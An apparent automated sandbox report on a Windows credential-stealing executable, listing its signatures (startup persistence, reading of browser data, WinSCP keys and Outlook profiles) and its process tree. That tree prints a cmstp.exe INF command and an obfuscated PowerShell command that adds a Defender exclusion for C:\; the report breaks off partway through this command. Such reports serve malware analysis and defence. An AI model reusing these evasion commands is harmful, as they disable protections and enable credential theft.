memory/2900-36-0x0000000000B40000-0x0000000000BB0000-memory.dmp

memory/2900-37-0x0000000000BB0000-0x0000000000C4C000-memory.dmp

memory/2900-41-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-39-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-53-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-71-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-38-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-51-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-49-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-55-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-57-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-59-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-61-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-47-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-63-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-66-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-45-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-67-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-69-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-73-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-75-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-43-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-77-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-79-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-81-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-83-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-85-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-87-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-89-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-91-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-93-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-96-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-101-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-99-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-97-0x0000000000BB0000-0x0000000000C46000-memory.dmp

memory/2900-2892-0x0000000000420000-0x000000000044C000-memory.dmp

memory/2900-2893-0x0000000002450000-0x000000000249C000-memory.dmp

memory/2900-2894-0x0000000004FC0000-0x00000000050B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 23:55

Reported

2024-11-09 23:57

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

outlook_office_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

outlook_win_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe

"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"

\??\c:\windows\system32\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\A.inf

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -exec bypass [char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]